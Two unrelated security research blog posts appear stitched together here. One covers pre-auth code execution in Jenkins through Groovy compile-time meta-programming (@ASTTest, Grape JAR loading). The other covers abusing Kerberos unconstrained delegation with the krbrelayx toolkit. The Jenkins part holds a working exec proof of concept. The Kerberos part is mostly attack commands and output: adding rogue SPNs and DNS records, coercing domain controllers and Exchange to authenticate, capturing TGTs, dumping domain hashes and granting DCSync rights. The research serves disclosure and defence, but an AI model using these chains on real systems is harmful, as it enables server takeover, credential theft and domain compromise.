This is the Hacking Jenkins series part two! For those people who still have not read the part one yet, you can check following link to get some basis and see how vulnerable Jenkins’ dynamic routing is!
As the previous article said, in order to utilize the vulnerability, we want to find a code execution can be chained with the ACL bypass vulnerability to a well-deserved pre-auth remote code execution! But, I failed. Due to the feature of dynamic routing, Jenkins checks the permission again before most dangerous invocations(Such as the Script Console)! Although we could bypass the first ACL, we still can’t do much things 🙁
After Jenkins released the Security Advisory and fixed the dynamic routing vulnerability on 2018-12-05, I started to organize my notes in order to write this Hacking Jenkins series. While reviewing notes, I found another exploitation way on a gadget that I failed to exploit before! Therefore, the part two is the story for that! This is also one of my favorite exploits and is really worth reading 🙂
Vulnerability Analysis
First, we start from the Jenkins Pipeline to explain CVE-2019-1003000! Generally the reason why people choose Jenkins is that Jenkins provides a powerful Pipeline feature, which makes writing scripts for software building, testing and delivering easier! You can imagine Pipeline is just a powerful language to manipulate the Jenkins(In fact, Pipeline is a DSL built with Groovy)
In order to check whether the syntax of user-supplied scripts is correct or not, Jenkins provides an interface for developers! Just think about if you are the developer, how will you implement this syntax-error-checking function? You can just write an AST(Abstract Syntax Tree) parser by yourself, but it’s too tough. So the easiest way is to reuse existing function and library!
As we mentioned before, Pipeline is just a DSL built with Groovy, so Pipeline must follow the Groovy syntax! If the Groovy parser can deal with the Pipeline script without errors, the syntax must be correct! The code fragments here shows how Jenkins validates the Pipeline:
public JSON doCheckScriptCompile(@QueryParameter String value) {
try {
CpsGroovyShell trusted = new CpsGroovyShellFactory(null).forTrusted().build();
new CpsGroovyShellFactory(null).withParent(trusted).build().getClassLoader().parseClass(value);
} catch (CompilationFailedException x) {
return JSONArray.fromObject(CpsFlowDefinitionValidator.toCheckStatus(x).toArray());
}
return CpsFlowDefinitionValidator.CheckStatus.SUCCESS.asJSON();
// Approval requirements are managed by regular stapler form validation (via doCheckScript)
}
Here Jenkins validates the Pipeline with the method GroovyClassLoader.parseClass(…)! It should be noted that this is just an AST parsing. Without running
execute()
method, any dangerous invocation won’t be executed! If you try to parse the following Groovy script, you get nothing 🙁
From the view of developers, the Pipeline can control Jenkins, so it must be dangerous and requires a strict permission check before every Pipeline invocation! However, this is just a simple syntax validation so the permission check here is more less than usual! Without any
execute()
method, it’s just an AST parser and must be safe! This is what I thought when the first time I saw this validation. However, while I was writing the technique blog, Meta-Programming flashed into my mind!
What is Meta-Programming
Meta-Programming is a kind of programming concept! The idea of Meta-Programming is providing an abstract layer for programmers to consider the program in a different way, and makes the program more flexible and efficient! There is no clear definition of Meta-Programming. In general, both processing the program by itself and writing programs that operate on other programs(compiler, interpreter or preprocessor…) are Meta-Programming! The philosophy here is very profound and could even be a big subject on Programming Language!
If it is still hard to understand, you can just regard
eval(...)
as another Meta-Programming, which lets you operate the program on the fly. Although it’s a little bit inaccurate, it’s still a good metaphor for understanding! In software engineering, there are also lots of techniques related to Meta-Programming. For example:
C Macro
C++ Template
Java Annotation
Ruby (Ruby is a Meta-Programming friendly language, even there are books for that)
DSL(Domain Specific Languages, such as Sinatra and Gradle)
When we are talking about Meta-Programming, we classify it into (1)compile-time and (2)run-time Meta-Programming according to the scope. Today, we focus on the compile-time Meta-Programming!
P.S. It’s hard to explain Meta-Programming in non-native language. If you are interested, here are some materials! Wiki, Ref1, Ref2 P.S. I am not a programming language master, if there is anything incorrect or inaccurate, please forgive me <(_ _)>
How to Exploit?
From the previous section we know Jenkins validates Pipeline by parseClass(…) and learn that Meta-Programming can poke the parser during compile-time! Compiling(or parsing) is a hard work with lots of tough things and hidden features. So, the idea is, is there any side effect we can leverage?
There are many simple cases which have proved Meta-Programming can make the program vulnerable, such as he macro expansion in C language:
#define a 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
#define b a,a,a,a,a,a,a,a,a,a,a,a,a,a,a,a
#define c b,b,b,b,b,b,b,b,b,b,b,b,b,b,b,b
#define d c,c,c,c,c,c,c,c,c,c,c,c,c,c,c,c
#define e d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d
#define f e,e,e,e,e,e,e,e,e,e,e,e,e,e,e,e
__int128 x[]={f,f,f,f,f,f,f,f};
or the compiler resource bomb(make a 16GB ELF by just 18 bytes):
int main[-1u]={1};
or calculating the Fibonacci number by compiler
template<int n>
struct fib {
static const int value = fib<n-1>::value + fib<n-2>::value;
};
template<> struct fib<0> { static const int value = 0; };
template<> struct fib<1> { static const int value = 1; };
int main() {
int a = fib<10>::value; // 55
int b = fib<20>::value; // 6765
int c = fib<40>::value; // 102334155
}
From the assembly language of compiled binary, we can make sure the result is calculated at compile-time, not run-time!
For more examples, you can refer to the article Build a Compiler Bomb on StackOverflow!
First Attempt
Back to our exploitation, Pipeline is just a DSL built with Groovy, and Groovy is also a Meta-Programming friendly language. We start reading the Groovy official Meta-Programming manual to find some exploitation ways. In the section 2.1.9, we found the
@groovy.transform.ASTTest
annotation. Here is its description:
@ASTTest
is a special AST transformation meant to help debugging other AST transformations or the Groovy compiler itself. It will let the developer “explore” the AST during compilation and perform assertions on the AST rather than on the result of compilation. This means that this AST transformations gives access to the AST before the Bytecode is produced.
@ASTTest
can be placed on any annotable node and requires two parameters:
What! perform assertions on the AST? Isn’t that what we want? Let’s write a simple Proof-of-Concept in local environment first:
this.class.classLoader.parseClass('''
@groovy.transform.ASTTest(value={
assert java.lang.Runtime.getRuntime().exec("touch pwned")
})
def x
''');
$ ls
poc.groovy
$ groovy poc.groovy
$ ls
poc.groovy pwned
Cool, it works! However, while reproducing this on the remote Jenkins, it shows:
unable to resolve class org.jenkinsci.plugins.workflow.libs.Library
What the hell!!! What’s wrong with that?
With a little bit digging, we found the root cause. This is caused by the Pipeline Shared Groovy Libraries Plugin! In order to reuse functions in Pipeline, Jenkins provides the feature that can import customized library into Pipeline! Jenkins will load this library before every executed Pipeline. As a result, the problem become lack of corresponding library in classPath during compile-time. That’s why the error
unsable to resolve class
occurs!
How to fix this problem? It’s simple! Just go to Jenkins Plugin Manager and remove the Pipeline Shared Groovy Libraries Plugin! It can fix the problem and then we can execute arbitrary code without any error! But, this is not a good solution because this plugin is installed along with the Pipeline. It’s lame to ask administrator to remove the plugin for code execution! We stop digging this and try to find another way!
Oh, from the article we know Grape is a built-in JAR dependency management in Groovy! It can help programmers import the library which are not in classPath. The usage looks like:
annotation, it can import the JAR file which is not in classPath during compile-time automatically! If you just want to bypass the Pipeline sandbox via a valid credential and the permission of Pipeline execution, that’s enough. You can follow the PoCproveded by @adamyordan to execute arbitrary commands!
However, without a valid credential and
execute()
method, this is just an AST parser and you even can’t control files on remote server. So, what can we do? By diving into more about
Wow, it works! Now, we believe we can make Jenkins import any malicious library by Grape! However, the next problem is, how to get code execution?
The Way to Code Execution
In the exploitation, the target is always escalating the read primitive or write primitive to code execution! From the previous section, we can write malicious JAR file into remote Jenkins server by Grape. However, the next problem is how to execute code?
void processOtherServices(ClassLoader loader, File f) {
try {
ZipFile zf = new ZipFile(f)
ZipEntry serializedCategoryMethods = zf.getEntry("META-INF/services/org.codehaus.groovy.runtime.SerializedCategoryMethods")
if (serializedCategoryMethods != null) {
processSerializedCategoryMethods(zf.getInputStream(serializedCategoryMethods))
}
ZipEntry pluginRunners = zf.getEntry("META-INF/services/org.codehaus.groovy.plugins.Runners")
if (pluginRunners != null) {
processRunners(zf.getInputStream(pluginRunners), f.getName(), loader)
}
} catch(ZipException ignore) {
// ignore files we can't process, e.g. non-jar/zip artifacts
// TODO log a warning
}
}
JAR file is just a subset of ZIP format. In the processOtherServices(…), Grape registers servies if there are some specified entry points. Among them, the
Runner
interests me. By looking into the implementation of processRunners(…), we found this:
With the exploit, we can gain full access on remote Jenkins server! We use Meta-Programming to import malicious JAR file during compile-time, and executing arbitrary code by the Runner service! Although there is a built-in Groovy Sandbox(Script Security Plugin) on Jenkins to protect the Pipeline, it’s useless because the vulnerability is in compile-time, not in run-time!
Because this is an attack vector on Groovy core, all methods related to the Groovy parser are affected! It breaks the developer’s thought which there is no execution so there is no problem. It is also an attack vector that requires the knowledge about computer science. Otherwise, you cannot think of the Meta-Programming! That’s what makes this vulnerability interesting. Aside from entry points
doCheckScriptCompile(...)
and
toJson(...)
I reported, after the vulnerability has been fixed, Mikhail Egorov also found another entry point quickly to trigger this vulnerability!
Apart from that, this vulnerability can also be chained with my previous exploit on Hacking Jenkins Part 1 to bypass the Overall/Read restriction to a well-deserved pre-auth remote code execution. If you fully understand the article, you know how to chain 😛
Thank you for reading this article and hope you like it! Here is the end of Hacking Jenkins series, I will publish more interesting researches in the future 🙂
There have been some interesting new developments recently to abuse Kerberos in Active Directory, and after my dive into Kerberos across trusts a few months ago, this post is about a relatively unknown (from attackers perspective), but dangerous feature: unconstrained Kerberos delegation. During the writing of this blog, this became quite a bit more relevant with the discovery of some intersting RPC calls that can get Domain Controllers to authenticate to you, which even allow for compromise across forest boundaries. Then there was the discovery of PrivExchange which can make Exchange authenticate in a similar way. Because tooling for unconstrained delegation abuse is quite scarce, I wrote a new toolkit, krbrelayx, which can abuse unconstrained delegation and get Ticket Granting Tickets (TGTs) from users connecting to your host. In this blog we will dive deeper into unconstrained delegation abuse and into some more advanced attacks that are possible with the krbrelayx toolkit.
Relaying Kerberos???
Before we start off, let’s clear up a possible confusion: no, you cannot actually relay Kerberos authentication in the way you can relay NTLM authentication. The reason the tool I’m releasing is called krbrelayx is because it works in a way similar to impackets ntlmrelayx (and shares quite some parts of the code). Kerberos tickets are partially encrypted with a key based on the password of the service a user is authenticating to, so sending this on to a different service is pointless as they won’t be able to decrypt the ticket (and thus we can’t authenticate). So what does this tool actually do? When Windows authenticates to service- or computeraccounts that have unconstrained delegation enabled, some interesting stuff happens (which I’ll explained later on) and those accounts end up with a usable TGT. If we (as an attacker) are the ones in control of this account, this TGT can then be used to authenticate to other services. Krbrelayx performs this in a similar way to when you are relaying with ntlmrelayx (with automatic dumping of passwords, obtaining DA privileges, or performing ACL based attacks), hence the similar naming. If you first want to read about what unconstrained delegation is on a high level, I recommend Sean Metcalf’s blog about it.
Attack requirements
To perform this unconstrained delegation attack, we already need to have a couple of requirements:
Control over an account with unconstrained delegation privileges
Permissions to modify the servicePrincipalName attribute of that account (optional)
Permissions to add/modify DNS records (optional)
A way to connect victim users/computers to us
Unconstrained delegation account
The first thing we need is an account that has unconstrained delegation privileges. This means an account that has the
TRUSTED_FOR_DELEGATION
UserAccountControl flag set. This can be on either a user account or a computer account. Any user in AD can query those accounts, using for example PowerView:
Once we compromised an account, which means we have obtained the account password or Kerberos keys, we can decrypt Kerberos service tickets used by users authenticating to the service associated with the compromised account. Previous ways to abuse unconstrained delegation involve dumping the cached tickets from LSASS using for example Mimikatz or Rubeus, but this requires executing code on a compromised host. In this blog we’ll avoid doing that, and instead do the whole thing over the network from a host we fully control without having to worry about endpoint detection or crashing production servers by dumping processes (though this doesn’t apply to Rubeus since it uses native APIs).
For user accounts, passwords can be obtained the typical way, by Kerberoasting, cracking NTLMv1/NTLMv2 authentication, simply guessing weak passwords or dumping them from memory on compromised hosts. Computer accounts are harder to obtain since they do by default have very strong randomly generated passwords and their password/keys only reside on the host the account belongs to (or on the DC). When we have Administrator rights on the associated host, it becomes relatively easy since the computer account password is stored in the registry and thus can be obtained via the network with secretsdump.py, or by dumping the secrets with mimikatz
lsadump::secrets
. Both also support dumping secrets from offline registry hives.
To calculate the Kerberos keys from plaintext passwords, we also need to specify the salt. If you’re familiar with Kerberos, you’ll know that there are different encryption algorithms used. The weakest cipher supported by modern AD installs uses RC4, with a key based on the NTLM hash of the user (not including any salt). The AES-128 and AES-256 ciphers that Windows will pick by default however do include a salt, which we will need to include in the key calculation. The salt to calculate these keys is as follows:
For user accounts, it is the uppercase Kerberos realm name + case sensitive username
For computer accounts, it is the uppercase realm name + the word host + full lowercase hostname
The Kerberos realm name is the fully qualified domain name (FQDN) of the domain (so not the NETBIOS name!), the full hostname is also the FQDN of the host, not just the machine name, and does not include an $. The username used as salt for user accounts is the case-sensitive SAMAccountName (so if the user is called
awEsOmEusER1
then
awesomeuser1
will not generate the correct key).
For computer accounts, I’ve added functionality to
secretsdump.py
which will automatically dump the machine Kerberos keys if you run it against a host (you will need at least impacket
0.9.18
or run the latest development version from git). If it can’t figure out the correct salt for some reason you can specify this yourself to krbrelayx.py with the
--krbpass
or
--krbhexpass
(for hex encoded binary computer account passwords) and
--krbsalt
parameters. As a sidenote, this took me way longer than expected to implement since computer accounts passwords are random binary in UTF-16-LE, but Kerberos uses UTF-8 input for key deriviation. The UTF-16 bytes are however not valid unicode, which makes Python not too happy when you try to convert this to UTF-8. It took me a while to figure out that Microsoft implementations actually implicitly replace all invalid unicode characters when performing the conversion to UTF-8 for Kerberos keys. After telling python to do the same the keys started matching with those on my DC ¯\_(ツ)_/¯.
Control over ServicePrincipalName attribute of the unconstrained delegation account
After having obtained the Kerberos keys of the compromised account we can decrypt the tickets, but we haven’t discussed yet how to actually get hosts to authenticate to us using Kerberos. When a user or computer wants to authenticate with Kerberos to the host
somehost.corp.com
over SMB, Windows will send a request for a service ticket to the Domain Controller. This request will include the Service Principal Name (SPN), made up from the protocol and the host which the service is on. In this example this would be
cifs/somehost.corp.com
. The Domain Controller performs a lookup in the directory which account (if any) has this ServicePrincipalName assigned, and then uses the Kerberos keys associated with that account to encrypt the service ticket (I’m skipping on the technical details for now, you can find those in a later paragraph).
To make sure that victims authenticate to the account with unconstrained delegation and that we can decrypt the tickets, we need to make sure to send their traffic to a hostname of which the SPN is associated with the account we are impersonating. If we have the hostname
attacker.corp.com
and that SPN is not registered to the right account, the attack won’t work. The easiest way to do this is if we have control over an account that has privileges to edit attributes of the computer- or useraccount that we compromised, in which case we can just add the SPN to that account using the addspn.py utility that is included with krbrelayx:
user@localhost:~/adtools$ python addspn.py -u testsegment\\backupadmin -s host/testme.testsegment.local -t w10-outlook.testsegment.local ldap://s2016dc.testsegment.local
Password:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
If we don’t have those privileges, it is a bit more complicated, and for user accounts I haven’t found a way to modify the SPNs without having those rights assigned. Computer accounts can by default add their own SPNs via the “Validated write to servicePrincipalName” right, but they can only write SPNs that match their full hostname or SAMAccountName. This would seem like a dead end, but there is a way around this! There is an additional validated write right, which allows computers to update their own
msDS-AdditionalDnsHostName
property, which got introduced in Server 2012 and contains additional hostnames for a computer object. According to the documentation, this validated write allows us to add any hostname which has the FQDN of the domain that we are in as a suffix, as long as we have the
Validated-MS-DS-Additional-DNS-Host-Name
validated write right. This right is not assigned by default:
While playing with this property however, it turned out that the
Validated-MS-DS-Additional-DNS-Host-Name
validated write right isn’t actually needed to update the
msDS-AdditionalDnsHostName
property. The “Validated write to DNS host name”, which is enabled for computer objects by default, does also allow us to write to the
msDS-AdditionalDnsHostName
property, and allows us to assign any hostname within the current domain to the computer object, for which SPNs will then automatically be added. With this trick it is possible to add an SPN to our account that we can point to a hostname that is under the control of an attacker:
user@localhost:~/adtools$ python addspn.py -u testsegment\\w10-outlook\$ -p aad3b435b51404eeaad3b435b51404ee:7a99efdea0e03b94db2e54c85911af47 -s testme.testsegment.local s2016dc.testsegment.local
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
user@localhost:~/adtools$ python addspn.py -u testsegment\\w10-outlook\$ -p aad3b435b51404eeaad3b435b51404ee:7a99efdea0e03b94db2e54c85911af47 s2016dc.testsegment.local -q
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=W10-OUTLOOK,CN=Computers,DC=testsegment,DC=local - STATUS: Read - READ TIME: 2018-11-18T20:44:33.730958
dNSHostName: W10-OUTLOOK.testsegment.local
msDS-AdditionalDnsHostName: TESTME$
testme.testsegment.local
sAMAccountName: W10-OUTLOOK$
servicePrincipalName: TERMSRV/TESTME
TERMSRV/testme.testsegment.local
WSMAN/TESTME
WSMAN/testme.testsegment.local
If for whatever reason we can’t modify the SPN to a hostname under the attackers control, we can always hijack the current SPN by modifying the DNS record or using your favorite spoofing/mitm attack, though this will break connectivity to the host, which I wouldn’t recommend in production environments.
Permissions to add/modify DNS records
After adding a new SPN that points to a hostname not in use on the network, we of course need to make sure the hostname we added resolves to our own IP. If the network you are in uses Active Directory-Integrated DNS, this should be straighforward. As Kevin Robertson described in his blog about ADIDNS, by default any authenticated user can create new DNS records, as long as there is no record yet for the hostname. So after we add the SPN for
attacker.corp.com
to our unconstrained delegation account, we can add a record for this hostname that points to our IP using for example PowerMad (different hostname used as example):
I also added a tool to the krbrelayx repo that can perform DNS modifications (
dnstool.py
) in AD over LDAP:
user@localhost:~/adtools$ python dnsparse.py -u icorp\\testuser icorp-dc.internal.corp -r attacker -a add -d 10.1.1.2
Password:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
Afterwards we can see the record exists in DNS:
user@localhost:~/adtools$ python dnsparse.py -u icorp\\testuser icorp-dc.internal.corp -r attacker -a query
Password:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found record attacker
DC=attacker,DC=internal.corp,CN=MicrosoftDNS,DC=DomainDnsZones,DC=internal,DC=corp
[+] Record entry:
- Type: 1 (A) (Serial: 36)
- Address: 10.1.1.2
And the record resolves after the DNS server refreshes the records from LDAP (which by default takes place every 180 seconds):
utility has several other options, including one to remove records again after exploitation, which I won’t go into in this post, but you can get the tool on GitHub. If modifying DNS does not work or the network you are in does not use AD for DNS, it is always possible to perform network attacks to take over the DNS server, though this often requires you to be in the same VLAN as the system. A way which should always work is modifying the compromised computers own DNS record, but this is almost a guarantee to break stuff and might take a while to propagate because of DNS caching.
Obtaining traffic
There are a multitude of ways now to obtain traffic from users to the attackers host. Any technique on the internet discussing NTLM authentication gathering techniques will work for getting users to authenticate to your rogue SMB or HTTP server. Some options are:
Phishing sites with a UNC path or redirect
Using responder, Inveigh or metasploit to reply to LLMNR/NBNS requests
Placing files with an icon linking to a UNC path on a popular file share within the network
Etc
Two very effective to obtain Domain Admin (equivalent) privileges via unconstrained delegation at the point of writing of this blog is to abuse bugs that require only regular user credentials to make a high value target connect to you. At this point, two important example are known:
SpoolService bug: There is a Remote Procedure Call part of the MS-RPRN protocol which causes remote computers to authenticate to arbitrary hosts via SMB. This was discovered by Lee Christensen aka @tifkin_ and called the “printer bug”. Harmj0y recently did a writeup on abusing this bug as well to perform unconstrained delegation attacks over forest trusts in his blog. The MS-RPRN protocol was also implemented in impacket by @agsolino, and of course I couldn’t resist writing a small utility for it as part of the krbrelayx toolkit, called
printerbug.py
, which triggers the backconnect.
PrivExchange: The Exchange Web Services (EWS) SOAP API exposes a method that subscribes to push notifications. This method can be called by any user with a mailbox and will make Exchange connect to any host we specify via HTTP. When requested, Exchange will (unless it is patched with the latest CU) authenticate with the computer account of the system Exchange is running on. This computer account has high privileges in the domain by default. I wrote about this in my previous blogand the
privexchange.py
tool is available here. Apart from NTLM relaying this authentication to LDAP, we can also use unconstrained delegation to obtain Exchange’s TGT and use that to perform an ACL based privilege escalation.
Use case 1: Gaining DC Sync privileges using a computer account and the SpoolService bug
In the first case we will abuse the unconstrained delegation privileges of a computer account in my
internal.corp
lab domain. We have obtained administrative privileges on this host by compromising the user
testuser
, which is a member of the Administrators group on this host. We will follow the steps outlined above, and first obtain the Kerberos keys and NTLM hashes:
Password:
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x38f3153a77837cf2c5d04b049727a771
...cut...
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
ICORP\ICORP-W10$:aes256-cts-hmac-sha1-96:9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab
ICORP\ICORP-W10$:aes128-cts-hmac-sha1-96:a6e34ed07f7bffba151fedee4d6640fd
ICORP\ICORP-W10$:des-cbc-md5:91abd073c7a8e534
ICORP\ICORP-W10$:aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6:::
Now we add the SPN. We use the NTLM hash that we just dumped to authenticate as the machine account, which can modify it’s own SPN, but only via the
user@localhost:~/krbrelayx$ python addspn.py -u icorp\\icorp-w10\$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -s HOST/attacker.internal.corp icorp-dc.internal.corp
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[!] Could not modify object, the server reports a constrained violation
[!] You either supplied a malformed SPN, or you do not have access rights to add this SPN (Validated write only allows adding SPNs matching the hostname)
[!] To add any SPN in the current domain, use --additional to add the SPN via the msDS-AdditionalDnsHostName attribute
user@localhost:~/krbrelayx$ python addspn.py -u icorp\\icorp-w10\$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -s HOST/attacker.internal.corp icorp-dc.internal.corp --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
The SPN for
attacker.internal.corp
now exists on the victim account, but the DNS entry for it does not yet exist. We use the
dnstool.py
utility to add the record, pointing to the attacker IP:
user@localhost:~/krbrelayx$ python dnstool.py -u icorp\\icorp-w10\$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -r attacker.internal.corp -d 192.168.111.87 --action add icorp-dc.internal.corp
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
user@localhost:~/krbrelayx$ nslookup attacker.internal.corp 192.168.111.2
Server: 192.168.111.2
Address: 192.168.111.2#53
Now we get the Domain Controller to authenticate to us via the printer bug, while we start krbrelayx in export mode, in which all extracted TGTs will be saved to disk. We provide the AES256 key to krbrelayx, since this key will be used by default for computer accounts.
[*] Attempting to trigger authentication via rprn RPC at icorp-dc.internal.corp
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
krbrelayx on a different screen:
user@localhost:~/krbrelayx$ sudo python krbrelayx.py -aesKey 9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk)
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 192.168.111.2
[*] Got ticket for ICORP-DC$@INTERNAL.CORP [krbtgt@INTERNAL.CORP]
[*] Saving ticket in ICORP-DC$@INTERNAL.CORP_krbtgt@INTERNAL.CORP.ccache
[*] SMBD: Received connection from 192.168.111.2
This gives us a TGT of the domain controller account, which has DC Sync privileges in the domain, meaning we can extract the hashes of all the accounts in the directory.
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a39494027fd39934e08a713c999e8cf3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:33168b759a89c059815d7aea5c27a3d9:::
...etc...
Use case 2: Abusing a service account and PrivExchange
The previous use case used a computer account and an SMB connection to obtain the TGT of a DC. While the above described method is the only way to perform this attack without executing code on the compromised host (all data is obtained via RPC calls, and the DC only connects to the attacker machine), usually it would be easier to trigger an SMB connection to the compromised host, dump LSASS memory and/or use Mimikatz or Rubeus to extract the TGTs from memory. This would not require modifying DNS records and SPNs. In the next case we will be using a user account (that is used as a service account) instead of a computer account. This is more complex or even impossible to exploit without modifying information in AD. If the user account is for example used for an MSSQL service, it would only be possible to extract the TGT from LSASS if we could somehow convince a victim to connect to the MSSQL service and also have Administrative access to the server to run the code that extracts the tickets from memory. By adding an extra SPN to the user account we can use existing tools such as the SpoolService bug or PrivExchange to exploit this via HTTP or SMB, without the need to touch the host on which this service is running at all.
This requires two things:
The password of the service account
Delegated control over the service account object
The password for the service account could have been previously obtained using a Kerberoast or password spraying attack. Delegated control over the account is required to add an SPN to the account, this control could be present because the service account is part of an Organisational Unit over which control was delegated to a sysadmin, or because we compromised an account in a high privilege group, such as Account Operators.
In this scenario we have control over a
helpdesk
user, which has been delegated the rights to manage users in the
Service Accounts
OU. We also discovered that the service account
sqlserv
has the weak password
Internal01
set. This service account only has an SPN for the MSSQL service running on
database.internal.corp
. Since we want to escalate privileges via Exchange with PrivExchange, which connects over HTTP, we add a new SPN using this account for
http/evil.internal.corp
:
user@localhost:~/krbrelayx$ python addspn.py -u icorp\\helpdesk -p Welkom01 -t sqlserv -s http/evil.internal.corp -q icorp-dc.internal.corp
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=sqlserv,OU=Service Accounts,DC=internal,DC=corp - STATUS: Read - READ TIME: 2019-01-27T15:26:16.580450
sAMAccountName: sqlserv
servicePrincipalName: MSSQL/database.internal.corp
user@localhost:~/krbrelayx$ python addspn.py -u icorp\\helpdesk -p Welkom01 -t sqlserv -s http/evil.internal.corp icorp-dc.internal.corp
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
As with the previous attack we add a DNS record to point to our attackers IP:
user@localhost:~/krbrelayx$ python dnstool.py -u icorp\\helpdesk -p Welkom01 -r evil.internal.corp -d 192.168.111.87 --action add icorp-dc.internal.corp
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
Now we can start krbrelayx.py. Since we are working with a user account, by default tickets will be encrypted with RC4, so we need to calculate the NTLM hash of the password in order to decrypt them (we don’t need to bother with a Kerberos salt here because RC4 doesn’t use one).
This hash we can pass to krbrelayx.py and we can start the server. This time instead of exporting the ticket we use it directly to connect to LDAP and grant our helpdesk user DCSync privileges using the
-t ldap://icorp-dc.internal.corp
flag. We run
privexchange.py
and
krbrelayx.py
at the same time:
user@localhost:~/privexchange$ python privexchange.py -u helpdesk -p Welkom01 -ah evil.internal.corp exchange.internal.corp -d internal.corp
INFO: Using attacker URL: http://evil.internal.corp/privexchange/
INFO: Exchange returned HTTP status 200 - authentication was OK
INFO: API call was successful
And see the attack doing it’s work in a very similar way to ntlmrelayx:
user@localhost:~/krbrelayx$ sudo python krbrelayx.py -hashes aad3b435b51404eeaad3b435b51404ee:d3026ba6ef6215da295175934b3d0e09 -t ldap://icorp-dc.internal.corp --escalate-user helpdesk
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in attack mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 192.168.111.56, prompting for authentication
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Received connection from 192.168.111.56, prompting for authentication
[*] HTTPD: Client requested path: /privexchange/
[*] Got ticket for EXCHANGE$@INTERNAL.CORP [krbtgt@INTERNAL.CORP]
[*] Saving ticket in EXCHANGE$@INTERNAL.CORP_krbtgt@INTERNAL.CORP.ccache
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User helpdesk now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20190210-132437.restore
The advantage (for an attacker) of this is that this uses Kerberos functionality instead of NTLM relaying, and thus mitigations against NTLM relaying do not apply (but it does require much higher privileges to perform). We could also have avoided calculating the Kerberos hashes manually and specified those on the commandline with the correct salt, which makes krbrelayx calculate all the keys by itself:
The previous paragraphs show us how we can abuse unconstrained delegatation, but we haven’t yet touched on how it all works under the hood. Let’s have a look at how a Windows 10 client uses Kerberos with unconstrained delegation. Some write-ups mention that whenever the Windows 10 client requests a service ticket to a host with unconstrained delegation, this ticket automatically includes a delegated version of a TGT. This is not how it actually works. Let’s look at what happens over the wire when a host authenticates to our attacker service.
When our user (testuser) logs in on the workstation, a TGT is requested from the DC (the KDC in this case). This is visible via two AS-REQs, the initial one which requests the TGT without any kind of information, and a second one in which preauthentication information is included.
In the reply to the first AS-REQ, we see that the server replies with the correct salt that should be used in case of AES key deriviation from the password:
Now we make the client connect to our malicious SMB server hosted using krbrelayx. In the traffic we see two requests for a service ticket (TGS-REQ), and after some SMB traffic in which the Kerberos authentication is performed.
Let’s take a closer look at these TGS requests. The first one is as expected, a service ticket is requested for the
cifs/attacker.internal.corp
SPN which we added to our account previously.
The second one however is interesting. This time the server requests a service ticket not for the service it is connecting to, but for the
krbtgt/internal.corp
SPN. This is similar to an AS-REQ request, in which this SPN is also used, but now it’s used in a TGS-REQ structure using the TGT with an authenticator. The second interesting part are the flags, especially the
forwarded
flag. This flag is used to request a TGT which can be used for delegation and will later be sent to the attacker’s rogue service.
How does Windows know whether it should request a forwarded TGT and send this to a server when authenticating? The encrypted ticket part has a ‘flags’ field, in which the ticket options are specified. RFC4120 defines an OK-AS-DELEGATE flag, which specifies that the target server is trusted for unconstrained delegation. Some changes made to getST.py from impacket show us that this flag is indeed set, it is easier however to just list the tickets in Windows with
klist
:
This command also shows us the
forwarded
TGT that will be sent to the attacker:
The attackers view
From the attackers perspective, we have set up
krbrelayx
and it is listening on port 445 and 80 to accept SMB and HTTP connections. When the victim connects to us (for which examples to trigger this are given above), they will authenticate with Kerberos if we request this. Unlike with NTLM authentication, which requires multiple messages back and forth, a client will directly send their Kerberos ticket upon authenticating. In both SMB and HTTP the GSS-API and SPNEGO protocols are used to wrap Kerberos authentication.
